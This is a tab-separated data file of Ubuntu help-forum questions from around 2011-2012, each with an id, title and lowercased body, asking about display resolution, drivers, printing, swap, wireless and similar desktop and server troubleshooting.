107677	dual monitor display space is larger than physical screen	i have a dual monitor setup involving a laptop and an external monitor and of course they are different sizes ( laptop-1366 x 768 and external-1280x1024 ) . i have noticed that while my laptop monitor is 768 pixels high , the virtual display is much bigger . in this screenshot of my display you can see on the left screen a light area which is the actual monitor size . the dark areas which appear at the top and bottom of the screen are n't visible on my physical monitor , but the os continues to place icons there and some applications even start there . does anyone know how to get rid of this surplus space ?
107679	why is my laptop getting hot using ubuntu	i switched from win7 to ubuntu and found that my laptop is getting too hot . ( very hot ) . when i was using win7 , it was very nice , cool . why this is happening and how do i fix it . details : lenovo g570 ; ubuntu 11.10 32-bit
107680	how do i access a partition with ubuntu ( installed with wubi )	okay , so i have two different partitions in windows , c : \ and e : . i installed ubuntu ( via wubi ) on the e : \ partition . how would i access the other partition ( c : ) ? cheers !
107686	openofficeorg calc always prints in landscape mode	so for some strange reason today anything i print in openoffice calc comes out in landscape mode . i have tried the following : set the print job from oo calc to portrait ( prints out in landscape ) tried opening a brand new file which by default is set to portrait ( prints out in landscape ) setting the default printer job orientation to portrait ( prints out in landscape ) print from gedit in portrait mode ( prints out in portrait ) not sure what else to try . any ideas ?
107695	add space to the previously assigned ubuntu	when i installed ubuntu with windows xp i put in a partition of 12 gb and if the installation asked me to assign a space not because i put half ( 6 gb ) and now i want to raise it and have read by hai to be using gparted i personally do not like using xd so here a picture of my partitions and so i say to do : sorry for my english xd http : //subir-imagenes.es/images/gparteljl.png http : //fotos.subefotos.com/a2ad5553fad135e3d9fb6170622c5392o.png how do i add more space ?
107696	ubuntu one client shows : ( valueerror : can not convert float nan to integer ) during setup	ubuntu 11.10 : ubuntu one client stops with the above error message while trying to synchronize . what does this mean ? how can i get rid of it ? ( newbie ! ) nobbes
107699	my pc does n't shutdown from gui	since at least a month , my 11.10-64bit pc does n't shutdown anymore from the gui . it simply freezes on plymouth screen . if i open gnome-terminal and type `` sudo poweroff '' , it shuts down correctly . this is very annoying . i do n't have any relevant message in the logs . it simply stops at `` the system will be halted '' ... but it does n't power off .
107701	how to disable lenses in the in the dash menu ?	how can i disable some lenses in the dash menu ?
107703	cairo dock with what desktop panel	i 'm using cairo-dock 2.4 on ubuntu 11.10 with the gnome classic ui . is there any other desktop ui i can use that will allow me to just have cairo-dock as the main/only panel ? i just need an all-in-one simple panel .
107707	how do i change my resolution to 1600*900 for a wide screen monitor ?	how do i change my resolution to 1600*900 for a wide screen monitor in oneiric ? my hardware configuration is as below : madhu @ madhu-home : ~ $ lspci 00:00.0 host bridge : silicon integrated systems [ sis ] 671mx 00:01.0 pci bridge : silicon integrated systems [ sis ] agp port ( virtual pci-to-pci bridge ) 00:02.0 isa bridge : silicon integrated systems [ sis ] sis968 [ mutiol media io ] ( rev 01 ) 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 [ ide ] ( rev 01 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:04.0 ethernet controller : silicon integrated systems [ sis ] 191 gigabit ethernet adapter ( rev 02 ) 00:05.0 ide interface : silicon integrated systems [ sis ] sata controller / ide mode ( rev 03 ) 00:06.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:07.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:0f.0 audio device : silicon integrated systems [ sis ] azalia audio controller 00:1f.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) madhu @ madhu-home : ~ $ cat /etc/x11/xorg.conf
107715	reducing disk writes : swapiness=0 or swapoff better ?	i am trying to minimise disk writes as i am running on a usb flash . is it better to set swappiness to zero or is it better to totally disable swap ? i have 8gb ram and i am using my server as : samba server afp server sabnzbd/couchpotato/sick-beard i might use it for apple timemeachine in the future but that is not in my immediate plans . by the way - how do i turn off swap permenantly ? is it just a case of commenting out the line in the fstab ? thanks .
107716	i need some suggestions for my system , about speeding up ubuntu	my computer ( sony vaio vpcf22s1e ) has inter core i7 ( 2ghz ) processor , 8gb ram ( details ) . there are 2 operation systems on my pc . windows 7 and ubuntu . my computer 's performance was great , a few months ago . but now it 's very slow . windows is faster than ubuntu , but still windows is really slow , too . also , my battery is empty in 45-60 minutes actually , i 'm not using windows 7 . i 'm using windows 2 or 3 hours in a week ( i 'm studing computer engineering and sometimes i need it , but generally i 'm working with ubuntu ) . i think there are a few applications which cause slowing down ubuntu . my question : how can i list all applications which open currently ? maybe they are slowing down my system ? recently i 'm using ubuntu 11.10 32 bit . if i install 64bit version ( my processor supporting 64bit ) , has it more performance than 32 bit ? should i remove windows 7 from my pc ? i 'll use windows inside ubuntu with a virtual machine , if i remove windows 7 . thank you , details : recently installed os ' : ubuntu 11.10 ( 32bit ) , windows 7 ( 64bit ) results of top : top - 23:41:56 up 7:20 , 2 users , load average : 0.11 , 0.13 , 0.12 tasks : 206 total , 2 running , 204 sleeping , 0 stopped , 0 zombie cpu ( s ) : 2.5 % us , 0.8 % sy , 0.0 % ni , 96.6 % id , 0.0 % wa , 0.0 % hi , 0.1 % si , 0.0 % st mem : 8251444k total , 3104320k used , 5147124k free , 242688k buffers swap : 0k total , 0k used , 0k free , 1782992k cached pid user pr ni virt res shr s % cpu % mem time+ command 1693 eray 20 0 404m 198m 39m s 10 2.5 10:15.15 compiz 1244 root 20 0 130m 108m 11m s 4 1.3 13:13.89 xorg 4400 eray 20 0 382m 55m 21m s 3 0.7 37:49.09 plugin-containe 28933 eray 20 0 139m 16m 10m s 3 0.2 0:01.37 gnome-terminal 1720 eray 20 0 197m 32m 16m s 2 0.4 1:39.11 nautilus 1795 eray 20 0 109m 10m 7632 s 2 0.1 1:07.08 bamfdaemon 27742 eray 20 0 8368 1872 1360 s 2 0.0 0:41.08 wget 1655 eray 20 0 7240 3312 916 s 1 0.0 1:44.20 dbus-daemon 1199 root 20 0 0 0 0 s 0 0.0 0:01.62 flush-8:0 1894 eray 20 0 101m 29m 11m s 0 0.4 0:32.20 gwibber-service 1935 eray 20 0 86252 31m 10m s 0 0.4 0:43.29 ubuntuone-syncd 4307 eray 20 0 1098m 259m 35m s 0 3.2 54:21.65 firefox 28917 root 20 0 0 0 0 s 0 0.0 0:00.05 kworker/0:0 28995 eray 20 0 2792 1072 780 r 0 0.0 0:00.17 top 1 root 20 0 3316 1852 1264 s 0 0.0 0:02.08 init 2 root 20 0 0 0 0 s 0 0.0 0:00.02 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:10.40 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 29 root 0 -20 0 0 0 s 0 0.0 0:00.00 cpuset 30 root 0 -20 0 0 0 s 0 0.0 0:00.00 khelper 31 root 0 -20 0 0 0 s 0 0.0 0:00.00 netns 33 root 20 0 0 0 0 s 0 0.0 0:00.02 sync_supers 34 root 20 0 0 0 0 s 0 0.0 0:00.00 bdi-default 35 root 0 -20 0 0 0 s 0 0.0 0:00.00 kintegrityd 36 root 0 -20 0 0 0 s 0 0.0 0:00.00 kblockd 37 root 0 -20 0 0 0 s 0 0.0 0:00.00 ata_sff 38 root 20 0 0 0 0 s 0 0.0 0:00.00 khubd 39 root 0 -20 0 0 0 s 0 0.0 0:00.00 md 41 root 20 0 0 0 0 s 0 0.0 0:00.00 khungtaskd 42 root 20 0 0 0 0 s 0 0.0 0:00.00 kswapd0 43 root 25 5 0 0 0 s 0 0.0 0:00.00 ksmd 44 root 39 19 0 0 0 s 0 0.0 0:00.00 khugepaged 45 root 20 0 0 0 0 s 0 0.0 0:00.00 fsnotify_mark 46 root 20 0 0 0 0 s 0 0.0 0:00.00 ecryptfs-kthrea 47 root 0 -20 0 0 0 s 0 0.0 0:00.00 crypto 55 root 0 -20 0 0 0 s 0 0.0 0:00.00 kthrotld 222 root 0 -20 0 0 0 s 0 0.0 0:00.00 firewire 229 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_0 231 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_1 232 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_2 233 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_3 234 root 20 0 0 0 0 s 0 0.0 0:01.02 scsi_eh_4 235 root 20 0 0 0 0 s 0 0.0 0:00.00 scsi_eh_5 275 root 20 0 0 0 0 s 0 0.0 0:01.51 jbd2/sda5-8 276 root 0 -20 0 0 0 s 0 0.0 0:00.00 ext4-dio-unwrit 330 root 20 0 2648 612 452 s 0 0.0 0:00.49 upstart udev-br 335 root 20 0 3100 1496 740 s 0 0.0 0:00.39 udevd 453 root 0 -20 0 0 0 s 0 0.0 0:00.00 cfg80211 523 root 0 -20 0 0 0 s 0 0.0 0:00.00 kpsmoused 587 root 0 -20 0 0 0 s 0 0.0 0:00.00 l2cap 609 root 0 -20 0 0 0 s 0 0.0 0:00.00 hd-audio0
107720	why does n't skype start ?	i downloaded and installed skype , but by clicking the icon it just does not start . what should i do ?
107721	java gui extremely slow	i 'm writing a java app and the gui is extremely slow on my ubuntu 11.10 64bit setup . it takes a few seconds to respond to some action . it runs flawlessly on both max os x and windows 7 , it actually works just fine on a fresh ubuntu 11.10 ( both 32 and 64bit ) virtualbox running on win7 . i have already tried three different java versions and it did n't help . what could be the problem ? current java version : java -version java version `` 1.6.0_26 '' java ( tm ) se runtime environment ( build 1.6.0_26-b03 ) java hotspot ( tm ) 64-bit server vm ( build 20.1-b02 , mixed mode )
107726	how to create animated gif images of a screencast ?	i 've seen animated gif images of screen casts ( like the one below ) promoted a few times on this site as a way to improve answers . what toolchain is being used to create these ? is there a program that does this automagically , or are people taking screencasts , converting them into a series of static frames , and then creating the gif images ?
107729	how to disable gnome-shell auto-open in dashboard	i am personalising my gnome-shell in ubuntu 11.10 i would like to disable the feature to open the gnome 's dashboard when i close the last window in a workspace . edit to clarify : the dashboard is available only in gnome shell . the dashboard opens if you press the windows key ( aka super ) or if you move the mouse to the upper left corner . if you close the last window of a workspace , but there are open windows on other workspaces , the dashboard opens automatically . the latter behaviour is annoying if you do not want to use the dashboard to open new windows or to change workspace . there are many ways to to both ( gnome do , docky , keyboard shortcuts , clicking on something on the desktop , ... ) . edit : there is a related q & a , which was closed because the asked the same question for mint : how can i prevent the activity view for opening when i close the last running app ?
107730	disable copying of 'nothing ' when copying and pasting in ubuntu	i run into this often , as i edit a lot of text on ubuntu , and sometimes instead of pressing the ctrl + v key to paste i press the ctrl + c key on the blank line i 'm trying to paste on . what this does is very annoying , now my clipboard is overwritten with 'nothing ' . i do n't know if it 's now a blank character or what , but it 's silly , i should still be able to keep what i had previously in the clipboard if i accidentally do a copy on a blank line . how do i prevent this from happening ?
107733	`` sudo update-alternatives -- install /bin/sh sh /bin/bash 1 '' returns `` command not found ''	i 've searched all over the web for a solution to this issue , with no success . i retrieved this command from this forum answer . but this only returns for me : sudo : udpate-alternatives : command not found i did find another forum response that indicated i should install chkconfig , which i did install , but i got the same result . any thoughts ?
107740	no sound via hdmi	i have ubuntu installed on a acer aspire revo 3700 intel atom processor with nvidia ion graphics this is plugged into a celcus 32 inch tv via hdmi ( 1080p ) . the video driver shows as an nvidia which i can select . i have set the sound to play via hdmi and the output to hdmi but get no sound . i have tried a sony 1080i tv with the box but get eratic results with the graphics , but the sound picks up straight away that is there is no need to select it . the graphics on the celcus tv work but i get a dialog box showing loads of different resolutions and frequencies which i have to close manually , these appear to be attempts to set different resolutions for the tv . am i missing some sort of screen/sound driver , if so does anyone know what might support the celcus 32 inch ( 1080p ) tv ?
107742	no 3d support on lenovo w520 with nvidia optimus	i know about projects like bumblebee but i do n't need them . i 've got a lenovo w520 and i can choose in the bios which graphics card i 'd like to use . and now my problem : i 've installed the nividia-driver and it work 's fine but when i switch to the integrated graphics card ( intel ) ubuntu is n't able to detect it . it boots up well but unity 3d does n't work which means that there is no 3d-support . what should i do now ? thanks for your help !
107745	`` could not load image '' error after edit the image with darktable	i can not open pictures which i have edited with darktable . thanks for helping !
107748	unable to `` cd '' into an external drive	i am new to linux . so please excuse me if my question is amateur . i have two partitions : `` windows and linux os '' both are listed as storage-files , called under the name of `` new volume '' the external drive is mounted under /media/new volume/.. but i am unable to `` cd '' into the drives ' file system . i can get into the drives ' files ystem with gnome , but i am unable to get in via terminal . is this related to the volumes name ? ( new volume ) the space between `` new '' and `` volume '' please help..
107749	ca n't install `` patch ''	i 'm trying to apply a patch to a package and i do n't seem to have patch installed , but when i type sudo apt-get install patch it gives me this message : ubuntu 11.10 oneiric ocelot - release amd64 ( 20111012 ) ' in the drive /cdrom/ and press enter how can i install it ? cuz i actually have the installation cd on my drive , but nothing happens .
107754	how do you make gnome-shell get out of the way in fullscreen apps ?	i mostly like gnome-shell , and much prefer it to unity at this point . ( in reality , both are greatly lacking in polish . ) however , when using fullscreen applications , i notice that the hot corners do not go away . this is most notable in virtualbox which i need to run to access windows programs for my job . the gnome-shell notification area covers up the bottom pixel of the entire ui , making the windows taskbar largely useless -- you go to click anything , then need to mouse up a tiny amount for windows to actually see the click . this behavior is particularly annoying . the [ windows ] key also fails to be passed to the applications that listen to it , as gnome-shell captures it instead . i sort of wish i could use gnome-shell with unity 's notifications instead , as that 's my only real gripe with it . otherwise , maybe it 's a virtualbox issue . is there a way to get virtualbox to play nice with the new shells ? ( this might affect unity as well , i have n't tried it . )
107760	will ubuntu for android be fully open source ?	i am truly happy that ubuntu-for-android is more than a prototype . yet , i 'm confused . i failed to fully realise this : going to be fully open source ? released eventually to the community to work on ? cheers , and keep up the amazing work
107762	using compizconfig keybindings to run command	i 'm trying to fix my keyboard keys brightness up/down . using acpi_listen pressing brightness up/down i have the result : video dd03 00000087 00000000 video dd03 00000086 00000000 running showkey : keycode 225 press keycode 225 release keycode 224 press keycode 224 release i have set on compizconfi
107771	ubuntu 11.04 stopped recognizing display driver , and can not connect to internet	every time i reset my computer , i get this message flash across the screen , about how my graphics card settings could not be detected . moreover , it does n't seem to be able to connect to the internet , when i run it in 'recovery mode ' . when i log in in command prompt , i get this message that ***system restart required*** . everything seems to be there , but i can not ( auto ) mount a usb thumb drive either to get the information off the box . it 's almost as if all my drivers stopped working . i am not sure where to begin . any help would be appreciated .
107781	nouveau driver logs into unity-2d by default	i have an old system with nvidia corporation nv25 [ geforce4 ti 4600 ] . when running ubuntu , the nouveau driver loads fine but does not log into unity with compiz . instead it logs into unity-2d . any idea how to enable 3d/ compiz with the nouveau driver . os : ubuntu 12.04 beta2 the nvidia driver is no more available for this graphics card , so have to rely on nouveau . update : bug reported on launchpad . see here . there has been no reply as yet to this bug-report - does anyone have any idea how to resolve this ? further information , also , if i use kubuntu desktop , kwin graphics works just fine . but , the users prefer unity over kde so i have uninstalled kubuntu . installing libgl1-mesa-dri-experimental does not have any effect on the installation . still booting to unity-2d /usr/lib/nux/unity_support_test -p opengl vendor string : nouveau opengl renderer string : mesa dri nv25 x86/mmx/sse2 opengl version string : 1.2 mesa 8.0.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : no gl fragment program : no gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : no unity 3d supported : no
107783	failing package manager ?	i am trying to download kcachegrind after a reinstallation of my os . but i keep getting `` dependency '' failures . i have tried going through the ubuntu software manager ( which worked perfectly before ... ) and synaptic . with synaptic , i got specific package failures and when i searched for the packages i got more package dependencies . after the 5th time of this i gave up because there must be something else going on . please help ?
107784	ubuntu 10.04 lucid : is there a way to disable the `` leave message '' button in the lock screen page ?	is there a way to disable the `` leave message '' button feature in the lock screen ? i 'd appreciate any tips and/or updates to change this to an optional feature . thank you ! scott
107791	ubuntu one problem	today i logged into my ubuntu one account using my webbrowser and after that i saw a screen prompting me to accept some kind of extension of my cloud space to 5 gb . after accepting this , i was unable to find the files i previously uploaded to my ubuntu one acc . so , i 'd like to now whether/where can i get my files ? p.s . i do n't know whether this matters or not but i have n't visited my account for a long time . oh , and sorry for my bad english .
107797	gkbd-keyboard-display failed : command not found	i have the esperanto keyboard layout enabled but when i click on `` show keyboard layout '' it gives me this error : gkbd-keyboard-display failed : command not found i installed cinnamon in hopes it would fix it .
107799	how to install sound driver	so after i downloaded the soundblaster driver and after viewing the readme , it described how to install the driver , which is over my head . i tested the sound driver as it currently is and only got sound out of the rear speakers , no other surround sound speaker works . instructions are : in terminal , goto source directory execute make command as root , make , make install how in the heck do i install this ? getting to the source directory i 'm fine with , i created the following location and extracted the tar file here /home/extract/ .
107802	how can i fix my files ' `` modified dates '' ?	i just discovered that some of my files have traveled back in time ! i like to keep my files arranged by modification date and was surprised to find that some ( but not all ) of my files are now showing a `` modified '' date in december , instead of today 's date like they should . i am using ubuntu release 10.04 ( lucid ) , kernel linux 2.6.32-38-generic , gnome 2.30.2 . the folder/directory i 'm looking at is in a ext3 filesystem . i booted up this morning , and it did do that disk check thing , but i do n't think it changed anything at that time ( but i was n't really on for long ) . it 's only after i booted up again this evening that i noticed things were n't where i expected them . this is so annoying ! does anybody know what happened and how i can fix this ?
107804	gedit scroll area stops short of the screen - am i missing something ?	i 'm using gedit 2.30.3 . even when the window is maximized , if i put the cursor all the way to the right to the scrollbar area and click to move up or down a screenfull of text , it wo n't do it ! it 's like gedit allocates a pixel at the extreme right just to annoy me ! i have to carefully position the cursor in the scroll area . what is going on and how can i change this behavior ?
107806	error `` can not display this video mode ''	the installation seemed to go well , but after the restart , i only get a black screen with a white text message that says `` can not display this video mode '' . how do i fix this ?
107809	what is the best desktop search engine or software	i want to know which is the best software for desktop search for ubuntu 11.10 regards , gourik
107816	deepin software centre unable to aunthenticate password	i am using kubuntu 11.10 . i tried installing deepin software centre in it . installation was successful but when i launched the application it asked for password . every time i entered the password , it showed me `` wrong password '' message .
107818	trying to compile but missing headers ?	so i 'm trying to update my sound card driver but i need to compile first . after entering the sudo make command , i run into errors , missing files , etc . see link . terminal_lines i 've installed the build-essentials with the following command : sudo apt-get install linux-headers- $ ( uname -r ) build-essential apparently i 'm missing something but do n't know what . suggestions ?
107819	how can i specify the default image viewer in mailcap ?	i have most of my home directory dot files shared across my home and work systems , each running a different version of ubuntu . i 'm looking for a way to specify the default image viewer for each system in ~/.mailcap , so when it 's invoked by mutt , the correct image viewer will start . my current work-around is to put the following in ~/.mailcap ... image/* ; viewimage % s ; test=test -n `` $ display '' ; ... where viewimage is a simple bash script : # ! /bin/bash hostname=`hostname` if [ $ hostname == 'work-host ' ] ; then imageviewer=geeqie elif [ $ hostname == 'home-host ' ] ; then imageviewer=ristretto fi $ imageviewer $ 1 any suggestions to avoid this workaround are appreciated .
107821	asus eee pc does n't have `` os installation '' or boot to in bios menu ?	i 'm trying to reformat an eee pc that only has external usb slots , no disc drive , and i ca n't find out how to install anything else on it as far as os ' go because it wo n't load from usb - the bios menu does n't show any way to boot from usb . anyone able to help me ? i know this question is n't specifically for installing ubuntu , but its more than anything a general question to installing another os so maybe you could still
107824	plymouth splash not showing , purple and black on boot	i 've got ubuntu 11.10 on asus machine with nvidia g-force 210m , ... everything works fine , but bootscreen plymouth splash does not show ... first time i 've had big resolution logo so i googled some info about that problem and tried some things > plymouth fix , editing /etc/default/grub changing setup at startup manager ... but it did not work ... now i only have a purple screen for a while , then a black screen and then the system starts ... can you help me figure out how to get the plymouth splash working ? thanx..
107834	dvd movies not mounting	ok my problem here is that if i insert a dvd movie into my drive it spins then nothing happens , however if i insert a data dvd it mounts and opens the files within 20 seconds . i have all medibuntu installed and libdvd etc . i am running ubuntu 11.10 not sure how to proceed as i am new to ubuntu . *-cdrom description : dvd-ram writer product : bddvdrw ct10n vendor : hl-dt-st physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom1 logical name : /dev/cdrw1 logical name : /dev/dvd1 logical name : /dev/dvdrw1 logical name : /dev/scd0 logical name : /dev/sr0 version : wa02 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc this is what shows with a dvd movie in the drive *-cdrom description : dvd-ram writer product : bddvdrw ct10n vendor : hl-dt-st physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom1 logical name : /dev/cdrw1 logical name : /dev/dvd1 logical name : /dev/dvdrw1 logical name : /dev/scd0 logical name : /dev/sr0 logical name : /media/grmculfrer_br_dvd version : wa02 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 mount.fstype=udf mount.options=ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , umask=77 , dmode=500 , iocharset=utf8 state=mounted status=ready *-medium physical id : 0 logical name : /dev/cdrom1 logical name : /media/grmculfrer_br_dvd configuration : mount.fstype=udf mount.options=ro , nosuid , nodev , relatime , uid=1000 , gid=1000 , umask=77 , dmode=500 , iocharset=utf8 state=mounted and this is with a data dvd inserted . anyone please help . let me know if you need any more info
107835	ifconfig bandwidth tracking	i 've been using ubuntu servers for a long time , but something i 've never quite understood was the ifconfig command and total bandwidth . i 've found that on every server i 've used , and some desktop versions , the bandwidth always resets its total when it hits something like 4.6gb . how can i change it where it keeps track of more total bandwidth ? i 've logged into a professional hosting site that uses ubuntu servers , and when i used ifconfig on their server it reported the real total , which ranged over the tb mark . i want my servers to do the same . thanks : ) xrpixer
107837	yellow screen freeze with radeon hd 5450 running ubuntu 11.10	this is my pc configuration : core 2 duo e4500 2 gb ddr2 intel dg41rq ( gma x4500 ) wd 500 gb hdd 400w psu amd radeon hd 5450 yesterday i installed a radeon hd 5450 card and i have installed the closed source radeon drivers after downloading the package from the amd website ( version 12.1 ) . the essential settings have been taken care of but i have having a weird problem . every time i shut down the system i get a yellow screen and the system freezes . while i restart i do get the yellow screen but the computer eventually reboots after a couple of seconds . i do n't think the card is faulty because it works perfectly with windows , it 's handling games and stuff . i do n't think the driver is broken because i am using it on another machine with radeon hd 6790 . is it the kernel or some setting that i 'm missing ? ? ps : i am using a 3.2.7-custom kernel . cheers , utsav
107838	how to automatically run two commands after login ?	i have these two commands that i need to manually run every time after login : autossh -m 2000 -n -f -q -d 127.0.0.1:7070 user @ domain.com and sudo mkdir /media/c sudo mount /dev/sda2 /media/c i 'd like to make them automatically run every time i boot and login to my computer . i 'm currently using 10.04lts . btw , i only vaguely know what init.d or runlevel mean . but i still prefer to know a command-line based way to achieve this , not a fancy gui way . also , the autossh will only succeed after ubuntu automatically detect and connect to my network , so should we let it retry infinitely until successfully executed ? thank you !
107847	problem with printer canon lbp6000b ( i-sensys )	i have printer canon lbp6000 and i tried to add printer from system settings - > printing . so i can add that printer but when i tried to print test page it does n't printing . can someone help me ?
107849	can i assign custom keyboard shortcuts for menu items in applications ?	osx allows user to add custom keyboard shortcuts for menu items . for instance you can define a custom keyboard shortcut for `` copy '' and it will work for every application that has a menu item called copy . is there a way to do this for gtk and/or kde applications ?
107858	moved logs to ram ( tmpfs ) and now got this problem	i have installed ubuntu server on flash and have done a few things to minimise writes to disk . one of the things i have done is to direct a number of directories to ram via tmpfs . you can see how i have things set up below : filesystem 1k-blocks used available use % mounted on /dev/sde1 1290072 1228448 0 100 % / udev 3990268 8 3990260 1 % /dev tmpfs 4032204 0 4032204 0 % /tmp tmpfs 1612884 296 1612588 1 % /run none 5120 0 5120 0 % /run/lock none 4032204 0 4032204 0 % /run/shm tmpfs 4032204 0 4032204 0 % /var/tmp tmpfs 4032204 564 4031640 1 % /var/log tmpfs 4032204 16 4032188 1 % /var/log/apt /dev/md127 3845715976 35833316 3809882660 1 % /massivedata /dev/sde6 2401840 82872 2196960 4 % /home i received an email from my system saying the following . anyone know what i should do to fix this ? /etc/cron.daily/man-db : /usr/bin/mandb : ca n't write to /var/cache/man/5766 : no space left on device run-parts : /etc/cron.daily/man-db exited with return code 2
107861	canon lbp 3050 laser printer problem	ubuntu failed to recognize or find drivers automatically for canon lbp 3050 laser printer ( usb connected ) . so i downloaded linux device driver from the canon website and installed . and ubuntu accepted it . but when i try to print something ... nothing happens ( means do not print it ) . what should i do to correct this error ?
107867	installed ubuntu via wubi , upgraded , now my network card appears to be fried	okay , so here 's what 's been going on : i installed ubuntu via wubi yesterday , worked fine . installed gnome shell , etc , etc . i was on it today , noticed there were a tonne of updates to install , which i did . then , i logged back onto my windows , played some tf2 . next , i decided to get microsoft office working on ubuntu , only to notice there was no internet . logged onto windows , same thing . i 've been trying to get it to work for 5 hours . completely uninstalled ubuntu , re-installed network card drivers , nothing . i 've done everything i can think of , short of reinstalling windows . when i plug my ethernet cable in , the lights that usually go on around the socket simply do n't light up , so i 'm wondering if somehow my network card broke during the updates that installed on ubuntu . any ideas ? sorry if this isnt the right place to post it , but i 'm kinda desperate , and fairly sure it happened because of ubuntu . cheers !
107873	how to use a theme in netbeans 7.1 ?	i have downloaded an external theme for netbeans . how to apply it ? i am using ubuntu 10.04 ( lts )
107875	gtk+ appearance in kubuntu	i changed my appearance in kubuntu to `` ms windows 9x '' , but the gtk+ applications remain with the oxygen style . i know about the `` gtk+ appearance '' tab in the settings , but it has only 2 options - `` oxygen-gtk '' and `` raleigh '' . how can i add `` ms windows 9x '' to the available options for gtk apps ?
107876	dsl network connection problem in ubuntu	in ubuntu 10 how can i 've access to internet through my dsl network.in windows7 i'vea network dialer , i just enter user name & password.in ubuntu i 've created a dsl network , in the add section i 've entered username and password but worth nothing.i only have access to the network 's internal website .
107877	video output to monitor is cut after installing ubuntu 11.10	i 'm a total newbie with ubuntu , installed windows numerous times over the years , but this o/s is utterly new to me . i am trying to install ubuntu 11.10 64-bit , i have checked the iso with winmd5sum to ensure that the download was ok . i have burned the image to disc and can see the files in windows xp 's explorer . i boot up the pc with the disc in the cd-rom drive , the bios is set for cd first boot . the pc starts up , i get an icon at the bottom of the screen ( looks like a keyboard , a = and a figure ? ) , then the screens switches off and goes into sleep mode . the cd continues to spin , the light flashes and it appears to be continuing to load for maybe a further 30 seconds . i presume it has then reached the point where it is waiting for me to input a command , but of course i ca n't do that as the screen is blank . i then tried i have tried 'nomodeset ' as suggested by an experienced ubuntu used at installation but this only lets it run until the required restart , i tried to enter it at the grub screen on start up but it states 'error no command exists ' ( or in very similar words ) . i then press the tab key to list all the available commands ( about a 100 of them i guess ) and nomodeset is not among them . so i am left with no option other that to continue to boot normally which then turned the screen off 30 seconds later , ubuntu again sounds like it loaded ok in the background and the start up sound played , at this point there is obviously nothing i can do . what are the options now ? ( copied from belarc advisor : ) motherboard : gigabyte ga-a75m-d2h - bus clock : 100 megahertz 3.00 gigahertz amd a8-3870 apu with radeon hd graphics 256 kilobyte primary memory cache 1024 kilobyte tertiary memory cache 64-bit ready multi-core ( 4 total ) not hyper-threaded [ amd radeon hd 6550d [ display adapter ] ( onboard graphics , no separate card ) i 'm using the motherboard 's vga output rather than the dvi one .
107879	bind keys to actions in kde 4	i mainly use windows and use linux/kubuntu occasionally , and would love it if the same windows shortcuts can be applied in kde 4 . shortcuts that i would love to have . winkey - launches the start menu . ctrl+shift+esc - brings up taskmanager winkey+d - issues the minimize all comand winkey+e - open up naultius can anyone suggest and method to bind the keys into doing the correct stuff ? edit # 1 : 5.also winkey+l - to lock the computer
107881	how to make others access my computer via internet ?	i am running ubuntu , and have installed apache . when i input my ip address on a web browser , i see the following message : file browser : main.sh main.exe is a file which exists in /var/www/ in my computer , and also , the html index.html also exists in the folder : index.html < html > < head > file browser < /head > < body > < a href = `` /main.py '' > main.sh < /a > < /body > < /html > now i want to let others download my file in /home/user/anotherfile.sh , except moving anotherfile.sh to /var/www , how can i let others access that file ? if using apache is inconvenient , any other ideas that implementing it ?
107883	how to use a eaton 3s 700va ups with ubuntu server ?	i have an eaton 3s 700va ups connected to my modem , qnap ts-412 and an ubuntu server . the eaton 's usb connection goes into my ubuntu server . i was wondering what software is the best for managing power interruptions . specifically , i want to get the ubuntu server to tell the qnap to shut down when there is no power , send an email to my gmail , and shutdown .
107887	system info showing vesa even after installing the officical amd drivers	i 've installed the amd catalyst drivers on 11.10 but still the system info window shows vesa . is it still using the generic vesa drivers or is it just a bug ? ?
107897	how do i run maven 2 ?	i have installed maven 2.2.1-5 via the ubuntu software center . how do i run it ? why does it not appear in ubuntu software center / installed software ? ( ubuntu software center / get software shows it is installed . ) i am on maverick ( 10.10 ) .
107899	wireless does n't work after suspend on a centrino wireless-n 130 on a samsung nc110-a01	i 'm using ubuntu 11.10 on a new samsung nc110-ao1 . whenever i resume a session after being suspended , my wireless will connect to the network , but i will not be able to view any websites . no data is being downloaded . a wired connection works fine . this problem occurs when on battery power , which is annoying as you do n't buy a netbook to keep it plugged in all the time . there is no problem with the wireless with windows 7 on the same machine . the problem disappears if i reboot , but this is n't a solution as it will come back and soon as i suspend/resume a session . i will not have access to the router on most connections i will be using , so anything involving turning it off and on is out of the question . how can i go about solving this problem ? any help will be much appreciated . this is the output of lshw -c network *-network description : wireless interface product : centrino wireless-n 130 vendor : intel corporation physical id : 0 bus info : pci @ 0000:05:00.0 logical name : wlan0 version : 34 serial : dc : a9:71:8d:91 : c2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-16-generic firmware=17.168.5.1 build 33993 ip=192.168.1.4 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:47 memory : f0100000-f0101fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:09:00.0 logical name : eth0 version : 05 serial : e8:11:32 : de : fb:76 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz 